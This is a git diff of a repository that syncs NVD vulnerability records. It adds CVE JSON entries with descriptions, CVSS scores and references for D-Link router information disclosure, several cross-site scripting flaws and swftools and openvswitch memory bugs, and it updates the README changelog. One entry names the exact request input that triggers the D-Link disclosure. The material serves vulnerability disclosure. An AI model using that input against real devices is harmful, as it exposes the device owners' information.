"CVE-2024-0717", + "sourceIdentifier": "cna@vuldb.com", + "published": "2024-01-19T16:15:11.190", + "lastModified": "2024-01-19T16:15:11.190", + "vulnStatus": "Received", + "descriptions": [ + { + "lang": "en", + "value": "A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "LOW", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 5.3, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 3.9, + "impactScore": 1.4 + } + ], + "cvssMetricV2": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "2.0", + "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", + "accessVector": "NETWORK", + "accessComplexity": "LOW", + "authentication": "NONE", + "confidentialityImpact": "PARTIAL", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 5.0 + }, + "baseSeverity": "MEDIUM", + "exploitabilityScore": 10.0, + "impactScore": 2.9, + "acInsufInfo": false, + "obtainAllPrivilege": false, + "obtainUserPrivilege": false, + "obtainOtherPrivilege": false, + "userInteractionRequired": false + } + ] + }, + "weaknesses": [ + { + "source": "cna@vuldb.com", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-200" + } + ] + } + ], + "references": [ + { + "url": "https://github.com/999zzzzz/D-Link", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?ctiid.251542", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?id.251542", + "source": "cna@vuldb.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2024/CVE-2024-07xx/CVE-2024-0718.json b/CVE-2024/CVE-2024-07xx/CVE-2024-0718.json new file mode 100644 index 00000000000..f473b133ab4 --- /dev/null +++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0718.json @@ -0,0 +1,88 @@ +{ + "id": "CVE-2024-0718", + "sourceIdentifier": "cna@vuldb.com", + "published": "2024-01-19T16:15:11.507", + "lastModified": "2024-01-19T16:15:11.507", + "vulnStatus": "Received", + "descriptions": [ + { + "lang": "en", + "value": "A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "HIGH", + "userInteraction": "REQUIRED", + "scope": "UNCHANGED", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 2.4, + "baseSeverity": "LOW" + }, + "exploitabilityScore": 0.9, + "impactScore": 1.4 + } + ], + "cvssMetricV2": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "2.0", + "vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N", + "accessVector": "NETWORK", + "accessComplexity": "LOW", + "authentication": "MULTIPLE", + "confidentialityImpact": "NONE", + "integrityImpact": "PARTIAL", + "availabilityImpact": "NONE", + "baseScore": 3.3 + }, + "baseSeverity": "LOW", + "exploitabilityScore": 6.4, + "impactScore": 2.9, + "acInsufInfo": false, + "obtainAllPrivilege": false, + "obtainUserPrivilege": false, + "obtainOtherPrivilege": false, + "userInteractionRequired": false + } + ] + }, + "weaknesses": [ + { + "source": "cna@vuldb.com", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-79" + } + ] + } + ], + "references": [ + { + "url": "https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?ctiid.251543", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?id.251543", + "source": "cna@vuldb.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2024/CVE-2024-07xx/CVE-2024-0720.json b/CVE-2024/CVE-2024-07xx/CVE-2024-0720.json new file mode 100644 index 00000000000..920e48952e2 --- /dev/null +++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0720.json @@ -0,0 +1,88 @@ +{ + "id": "CVE-2024-0720", + "sourceIdentifier": "cna@vuldb.com", + "published": "2024-01-19T16:15:11.733", + "lastModified": "2024-01-19T16:15:11.733", + "vulnStatus": "Received", + "descriptions": [ + { + "lang": "en", + "value": "A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "REQUIRED", + "scope": "UNCHANGED", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 3.5, + "baseSeverity": "LOW" + }, + "exploitabilityScore": 2.1, + "impactScore": 1.4 + } + ], + "cvssMetricV2": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "2.0", + "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", + "accessVector": "NETWORK", + "accessComplexity": "LOW", + "authentication": "SINGLE", + "confidentialityImpact": "NONE", + "integrityImpact": "PARTIAL", + "availabilityImpact": "NONE", + "baseScore": 4.0 + }, + "baseSeverity": "MEDIUM", + "exploitabilityScore": 8.0, + "impactScore": 2.9, + "acInsufInfo": false, + "obtainAllPrivilege": false, + "obtainUserPrivilege": false, + "obtainOtherPrivilege": false, + "userInteractionRequired": false + } + ] + }, + "weaknesses": [ + { + "source": "cna@vuldb.com", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-79" + } + ] + } + ], + "references": [ + { + "url": "https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?ctiid.251544", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?id.251544", + "source": "cna@vuldb.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2024/CVE-2024-07xx/CVE-2024-0721.json b/CVE-2024/CVE-2024-07xx/CVE-2024-0721.json new file mode 100644 index 00000000000..77477a857d5 --- /dev/null +++ b/CVE-2024/CVE-2024-07xx/CVE-2024-0721.json @@ -0,0 +1,88 @@ +{ + "id": "CVE-2024-0721", + "sourceIdentifier": "cna@vuldb.com", + "published": "2024-01-19T16:15:11.953", + "lastModified": "2024-01-19T16:15:11.953", + "vulnStatus": "Received", + "descriptions": [ + { + "lang": "en", + "value": "A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability." + } + ], + "metrics": { + "cvssMetricV31": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "REQUIRED", + "scope": "UNCHANGED", + "confidentialityImpact": "NONE", + "integrityImpact": "LOW", + "availabilityImpact": "NONE", + "baseScore": 3.5, + "baseSeverity": "LOW" + }, + "exploitabilityScore": 2.1, + "impactScore": 1.4 + } + ], + "cvssMetricV2": [ + { + "source": "cna@vuldb.com", + "type": "Secondary", + "cvssData": { + "version": "2.0", + "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", + "accessVector": "NETWORK", + "accessComplexity": "LOW", + "authentication": "SINGLE", + "confidentialityImpact": "NONE", + "integrityImpact": "PARTIAL", + "availabilityImpact": "NONE", + "baseScore": 4.0 + }, + "baseSeverity": "MEDIUM", + "exploitabilityScore": 8.0, + "impactScore": 2.9, + "acInsufInfo": false, + "obtainAllPrivilege": false, + "obtainUserPrivilege": false, + "obtainOtherPrivilege": false, + "userInteractionRequired": false + } + ] + }, + "weaknesses": [ + { + "source": "cna@vuldb.com", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-79" + } + ] + } + ], + "references": [ + { + "url": "https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?ctiid.251545", + "source": "cna@vuldb.com" + }, + { + "url": "https://vuldb.com/?id.251545", + "source": "cna@vuldb.com" + } + ] +} \ No newline at end of file diff --git a/CVE-2024/CVE-2024-217xx/CVE-2024-21733.json b/CVE-2024/CVE-2024-217xx/CVE-2024-21733.json index bf34af981e1..7eb2b073c42 100644 --- a/CVE-2024/CVE-2024-217xx/CVE-2024-21733.json +++ b/CVE-2024/CVE-2024-217xx/CVE-2024-21733.json @@ -2,8 +2,8 @@ "id": "CVE-2024-21733", "sourceIdentifier": "security@apache.org", "published": "2024-01-19T11:15:08.043", - "lastModified": "2024-01-19T12:15:08.683", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:26.533", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2024/CVE-2024-225xx/CVE-2024-22562.json b/CVE-2024/CVE-2024-225xx/CVE-2024-22562.json new file mode 100644 index 00000000000..29879c64b92 --- /dev/null +++ b/CVE-2024/CVE-2024-225xx/CVE-2024-22562.json @@ -0,0 +1,20 @@ +{ + "id": "CVE-2024-22562", + "sourceIdentifier": "cve@mitre.org", + "published": "2024-01-19T15:15:09.463", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", + "descriptions": [ + { + "lang": "en", + "value": "swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c." + } + ], + "metrics": {}, + "references": [ + { + "url": "https://github.com/matthiaskramm/swftools/issues/210", + "source": "cve@mitre.org" + } + ] +} \ No newline at end of file diff --git a/CVE-2024/CVE-2024-225xx/CVE-2024-22563.json b/CVE-2024/CVE-2024-225xx/CVE-2024-22563.json new file mode 100644 index 00000000000..40082648b37 --- /dev/null +++ b/CVE-2024/CVE-2024-225xx/CVE-2024-22563.json @@ -0,0 +1,20 @@ +{ + "id": "CVE-2024-22563", + "sourceIdentifier": "cve@mitre.org", + "published": "2024-01-19T15:15:09.513", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", + "descriptions": [ + { + "lang": "en", + "value": "openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c." + } + ], + "metrics": {}, + "references": [ + { + "url": "https://github.com/openvswitch/ovs-issues/issues/315", + "source": "cve@mitre.org" + } + ] +} \ No newline at end of file diff --git a/CVE-2024/CVE-2024-228xx/CVE-2024-22876.json b/CVE-2024/CVE-2024-228xx/CVE-2024-22876.json index 3b6d7d71d25..397c713753a 100644 --- a/CVE-2024/CVE-2024-228xx/CVE-2024-22876.json +++ b/CVE-2024/CVE-2024-228xx/CVE-2024-22876.json @@ -2,8 +2,8 @@ "id": "CVE-2024-22876", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:13.510", - "lastModified": "2024-01-19T14:15:13.510", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2024/CVE-2024-228xx/CVE-2024-22877.json b/CVE-2024/CVE-2024-228xx/CVE-2024-22877.json index 89ec48a9ce0..1bae0d115b7 100644 --- a/CVE-2024/CVE-2024-228xx/CVE-2024-22877.json +++ b/CVE-2024/CVE-2024-228xx/CVE-2024-22877.json @@ -2,8 +2,8 @@ "id": "CVE-2024-22877", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:13.557", - "lastModified": "2024-01-19T14:15:13.557", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2024/CVE-2024-229xx/CVE-2024-22920.json b/CVE-2024/CVE-2024-229xx/CVE-2024-22920.json new file mode 100644 index 00000000000..27f576924fd --- /dev/null +++ b/CVE-2024/CVE-2024-229xx/CVE-2024-22920.json @@ -0,0 +1,20 @@ +{ + "id": "CVE-2024-22920", + "sourceIdentifier": "cve@mitre.org", + "published": "2024-01-19T15:15:09.560", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", + "descriptions": [ + { + "lang": "en", + "value": "swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c." + } + ], + "metrics": {}, + "references": [ + { + "url": "https://github.com/matthiaskramm/swftools/issues/211", + "source": "cve@mitre.org" + } + ] +} \ No newline at end of file diff --git a/CVE-2024/CVE-2024-233xx/CVE-2024-23387.json b/CVE-2024/CVE-2024-233xx/CVE-2024-23387.json index 9c444e9dcb2..7b23486619e 100644 --- a/CVE-2024/CVE-2024-233xx/CVE-2024-23387.json +++ b/CVE-2024/CVE-2024-233xx/CVE-2024-23387.json @@ -2,12 +2,16 @@ "id": "CVE-2024-23387", "sourceIdentifier": "vultures@jpcert.or.jp", "published": "2024-01-19T04:15:09.987", - "lastModified": "2024-01-19T04:15:09.987", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:26.533", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", "value": "FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product." + }, + { + "lang": "es", + "value": "FusionPBX anterior a 5.1.0 contiene una vulnerabilidad de Cross-Site Scripting. Si esta vulnerabilidad es aprovechada por un atacante remoto autenticado con privilegios administrativos, se puede ejecutar un script arbitrario en el navegador web del usuario que inicia sesi\u00f3n en el producto." } ], "metrics": {}, diff --git a/CVE-2024/CVE-2024-236xx/CVE-2024-23659.json b/CVE-2024/CVE-2024-236xx/CVE-2024-23659.json index 4c1e7cfea23..4f44ff34de9 100644 --- a/CVE-2024/CVE-2024-236xx/CVE-2024-23659.json +++ b/CVE-2024/CVE-2024-236xx/CVE-2024-23659.json @@ -2,12 +2,16 @@ "id": "CVE-2024-23659", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T05:15:09.233", - "lastModified": "2024-01-19T05:15:09.233", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:26.533", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", "value": "SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js." + }, + { + "lang": "es", + "value": "SPIP anterior a 4.1.14 y 4.2.x anterior a 4.2.8 permite XSS mediante el nombre de un archivo cargado. Esto est\u00e1 relacionado con javascript/bigup.js y javascript/bigup.utils.js." } ], "metrics": {}, diff --git a/README.md b/README.md index 28bfcad8325..2ee64737669 100644 --- a/README.md +++ b/README.md @@ -9,13 +9,13 @@ Repository synchronizes with the NVD every 2 hours. ### Last Repository Update ```plain -2024-01-19T15:00:24.702129+00:00 +2024-01-19T17:00:25.391679+00:00 ``` ### Most recent CVE Modification Timestamp synchronized with NVD ```plain -2024-01-19T14:54:30.993000+00:00 +2024-01-19T16:35:49.683000+00:00 ``` ### Last Data Feed Release @@ -29,56 +29,57 @@ Download and Changelog: [Click](https://github.com/fkie-cad/nvd-json-data-feeds/ ### Total Number of included CVEs ```plain -236371 +236384 ``` ### CVEs added in the last Commit -Recently added CVEs: `12` +Recently added CVEs: `13` -* [CVE-2023-27168](CVE-2023/CVE-2023-271xx/CVE-2023-27168.json) (`2024-01-19T14:15:12.247`) -* [CVE-2023-43985](CVE-2023/CVE-2023-439xx/CVE-2023-43985.json) (`2024-01-19T14:15:12.317`) -* [CVE-2023-46351](CVE-2023/CVE-2023-463xx/CVE-2023-46351.json) (`2024-01-19T14:15:12.367`) -* [CVE-2023-50028](CVE-2023/CVE-2023-500xx/CVE-2023-50028.json) (`2024-01-19T14:15:12.413`) -* [CVE-2023-50030](CVE-2023/CVE-2023-500xx/CVE-2023-50030.json) (`2024-01-19T14:15:12.453`) -* [CVE-2023-51946](CVE-2023/CVE-2023-519xx/CVE-2023-51946.json) (`2024-01-19T14:15:12.500`) -* [CVE-2023-51947](CVE-2023/CVE-2023-519xx/CVE-2023-51947.json) (`2024-01-19T14:15:12.553`) -* [CVE-2023-51948](CVE-2023/CVE-2023-519xx/CVE-2023-51948.json) (`2024-01-19T14:15:12.663`) -* [CVE-2024-0712](CVE-2024/CVE-2024-07xx/CVE-2024-0712.json) (`2024-01-19T14:15:12.837`) -* [CVE-2024-0713](CVE-2024/CVE-2024-07xx/CVE-2024-0713.json) (`2024-01-19T14:15:13.277`) -* [CVE-2024-22876](CVE-2024/CVE-2024-228xx/CVE-2024-22876.json) (`2024-01-19T14:15:13.510`) -* [CVE-2024-22877](CVE-2024/CVE-2024-228xx/CVE-2024-22877.json) (`2024-01-19T14:15:13.557`) +* [CVE-2022-40700](CVE-2022/CVE-2022-407xx/CVE-2022-40700.json) (`2024-01-19T15:15:08.020`) +* [CVE-2022-45083](CVE-2022/CVE-2022-450xx/CVE-2022-45083.json) (`2024-01-19T15:15:08.247`) +* [CVE-2022-45845](CVE-2022/CVE-2022-458xx/CVE-2022-45845.json) (`2024-01-19T15:15:08.467`) +* [CVE-2022-47160](CVE-2022/CVE-2022-471xx/CVE-2022-47160.json) (`2024-01-19T15:15:08.777`) +* [CVE-2024-0714](CVE-2024/CVE-2024-07xx/CVE-2024-0714.json) (`2024-01-19T15:15:08.997`) +* [CVE-2024-0716](CVE-2024/CVE-2024-07xx/CVE-2024-0716.json) (`2024-01-19T15:15:09.240`) +* [CVE-2024-22562](CVE-2024/CVE-2024-225xx/CVE-2024-22562.json) (`2024-01-19T15:15:09.463`) +* [CVE-2024-22563](CVE-2024/CVE-2024-225xx/CVE-2024-22563.json) (`2024-01-19T15:15:09.513`) +* [CVE-2024-22920](CVE-2024/CVE-2024-229xx/CVE-2024-22920.json) (`2024-01-19T15:15:09.560`) +* [CVE-2024-0717](CVE-2024/CVE-2024-07xx/CVE-2024-0717.json) (`2024-01-19T16:15:11.190`) +* [CVE-2024-0718](CVE-2024/CVE-2024-07xx/CVE-2024-0718.json) (`2024-01-19T16:15:11.507`) +* [CVE-2024-0720](CVE-2024/CVE-2024-07xx/CVE-2024-0720.json) (`2024-01-19T16:15:11.733`) +* [CVE-2024-0721](CVE-2024/CVE-2024-07xx/CVE-2024-0721.json) (`2024-01-19T16:15:11.953`) ### CVEs modified in the last Commit -Recently modified CVEs: `46` +Recently modified CVEs: `69` -* [CVE-2024-0486](CVE-2024/CVE-2024-04xx/CVE-2024-0486.json) (`2024-01-19T14:21:56.513`) -* [CVE-2024-0485](CVE-2024/CVE-2024-04xx/CVE-2024-0485.json) (`2024-01-19T14:22:14.600`) -* [CVE-2024-0474](CVE-2024/CVE-2024-04xx/CVE-2024-0474.json) (`2024-01-19T14:23:04.517`) -* [CVE-2024-0484](CVE-2024/CVE-2024-04xx/CVE-2024-0484.json) (`2024-01-19T14:23:24.007`) -* [CVE-2024-20985](CVE-2024/CVE-2024-209xx/CVE-2024-20985.json) (`2024-01-19T14:24:29.627`) -* [CVE-2024-20983](CVE-2024/CVE-2024-209xx/CVE-2024-20983.json) (`2024-01-19T14:24:38.097`) -* [CVE-2024-20981](CVE-2024/CVE-2024-209xx/CVE-2024-20981.json) (`2024-01-19T14:24:48.497`) -* [CVE-2024-20977](CVE-2024/CVE-2024-209xx/CVE-2024-20977.json) (`2024-01-19T14:25:05.253`) -* [CVE-2024-20975](CVE-2024/CVE-2024-209xx/CVE-2024-20975.json) (`2024-01-19T14:25:11.520`) -* [CVE-2024-20973](CVE-2024/CVE-2024-209xx/CVE-2024-20973.json) (`2024-01-19T14:25:24.967`) -* [CVE-2024-20971](CVE-2024/CVE-2024-209xx/CVE-2024-20971.json) (`2024-01-19T14:25:31.020`) -* [CVE-2024-20969](CVE-2024/CVE-2024-209xx/CVE-2024-20969.json) (`2024-01-19T14:25:42.850`) -* [CVE-2024-20967](CVE-2024/CVE-2024-209xx/CVE-2024-20967.json) (`2024-01-19T14:25:50.880`) -* [CVE-2024-20965](CVE-2024/CVE-2024-209xx/CVE-2024-20965.json) (`2024-01-19T14:26:06.187`) -* [CVE-2024-20963](CVE-2024/CVE-2024-209xx/CVE-2024-20963.json) (`2024-01-19T14:26:13.473`) -* [CVE-2024-20961](CVE-2024/CVE-2024-209xx/CVE-2024-20961.json) (`2024-01-19T14:26:21.527`) -* [CVE-2024-0233](CVE-2024/CVE-2024-02xx/CVE-2024-0233.json) (`2024-01-19T14:28:14.077`) -* [CVE-2024-0235](CVE-2024/CVE-2024-02xx/CVE-2024-0235.json) (`2024-01-19T14:28:22.047`) -* [CVE-2024-0236](CVE-2024/CVE-2024-02xx/CVE-2024-0236.json) (`2024-01-19T14:28:41.540`) -* [CVE-2024-0237](CVE-2024/CVE-2024-02xx/CVE-2024-0237.json) (`2024-01-19T14:29:02.700`) -* [CVE-2024-0238](CVE-2024/CVE-2024-02xx/CVE-2024-0238.json) (`2024-01-19T14:29:13.280`) -* [CVE-2024-22628](CVE-2024/CVE-2024-226xx/CVE-2024-22628.json) (`2024-01-19T14:33:00.143`) -* [CVE-2024-22627](CVE-2024/CVE-2024-226xx/CVE-2024-22627.json) (`2024-01-19T14:38:53.237`) -* [CVE-2024-22626](CVE-2024/CVE-2024-226xx/CVE-2024-22626.json) (`2024-01-19T14:40:09.903`) -* [CVE-2024-22625](CVE-2024/CVE-2024-226xx/CVE-2024-22625.json) (`2024-01-19T14:40:27.910`) +* [CVE-2023-40692](CVE-2023/CVE-2023-406xx/CVE-2023-40692.json) (`2024-01-19T16:15:09.330`) +* [CVE-2023-46219](CVE-2023/CVE-2023-462xx/CVE-2023-46219.json) (`2024-01-19T16:15:09.430`) +* [CVE-2023-47701](CVE-2023/CVE-2023-477xx/CVE-2023-47701.json) (`2024-01-19T16:15:09.547`) +* [CVE-2023-49285](CVE-2023/CVE-2023-492xx/CVE-2023-49285.json) (`2024-01-19T16:15:09.653`) +* [CVE-2023-49286](CVE-2023/CVE-2023-492xx/CVE-2023-49286.json) (`2024-01-19T16:15:09.793`) +* [CVE-2023-49288](CVE-2023/CVE-2023-492xx/CVE-2023-49288.json) (`2024-01-19T16:15:09.930`) +* [CVE-2023-50269](CVE-2023/CVE-2023-502xx/CVE-2023-50269.json) (`2024-01-19T16:15:10.063`) +* [CVE-2023-50495](CVE-2023/CVE-2023-504xx/CVE-2023-50495.json) (`2024-01-19T16:15:10.193`) +* [CVE-2023-5528](CVE-2023/CVE-2023-55xx/CVE-2023-5528.json) (`2024-01-19T16:15:10.280`) +* [CVE-2023-5868](CVE-2023/CVE-2023-58xx/CVE-2023-5868.json) (`2024-01-19T16:15:10.410`) +* [CVE-2023-5869](CVE-2023/CVE-2023-58xx/CVE-2023-5869.json) (`2024-01-19T16:15:10.620`) +* [CVE-2023-5870](CVE-2023/CVE-2023-58xx/CVE-2023-5870.json) (`2024-01-19T16:15:10.867`) +* [CVE-2023-6277](CVE-2023/CVE-2023-62xx/CVE-2023-6277.json) (`2024-01-19T16:15:11.057`) +* [CVE-2023-42136](CVE-2023/CVE-2023-421xx/CVE-2023-42136.json) (`2024-01-19T16:19:25.047`) +* [CVE-2023-42137](CVE-2023/CVE-2023-421xx/CVE-2023-42137.json) (`2024-01-19T16:21:06.650`) +* [CVE-2023-4818](CVE-2023/CVE-2023-48xx/CVE-2023-4818.json) (`2024-01-19T16:35:49.683`) +* [CVE-2024-0712](CVE-2024/CVE-2024-07xx/CVE-2024-0712.json) (`2024-01-19T15:56:19.500`) +* [CVE-2024-0713](CVE-2024/CVE-2024-07xx/CVE-2024-0713.json) (`2024-01-19T15:56:19.500`) +* [CVE-2024-22876](CVE-2024/CVE-2024-228xx/CVE-2024-22876.json) (`2024-01-19T15:56:19.500`) +* [CVE-2024-22877](CVE-2024/CVE-2024-228xx/CVE-2024-22877.json) (`2024-01-19T15:56:19.500`) +* [CVE-2024-23387](CVE-2024/CVE-2024-233xx/CVE-2024-23387.json) (`2024-01-19T15:56:26.533`) +* [CVE-2024-23659](CVE-2024/CVE-2024-236xx/CVE-2024-23659.json) (`2024-01-19T15:56:26.533`) +* [CVE-2024-0705](CVE-2024/CVE-2024-07xx/CVE-2024-0705.json) (`2024-01-19T15:56:26.533`) +* [CVE-2024-21733](CVE-2024/CVE-2024-217xx/CVE-2024-21733.json) (`2024-01-19T15:56:26.533`) +* [CVE-2024-0318](CVE-2024/CVE-2024-03xx/CVE-2024-0318.json) (`2024-01-19T16:13:08.503`) ## Download and Usage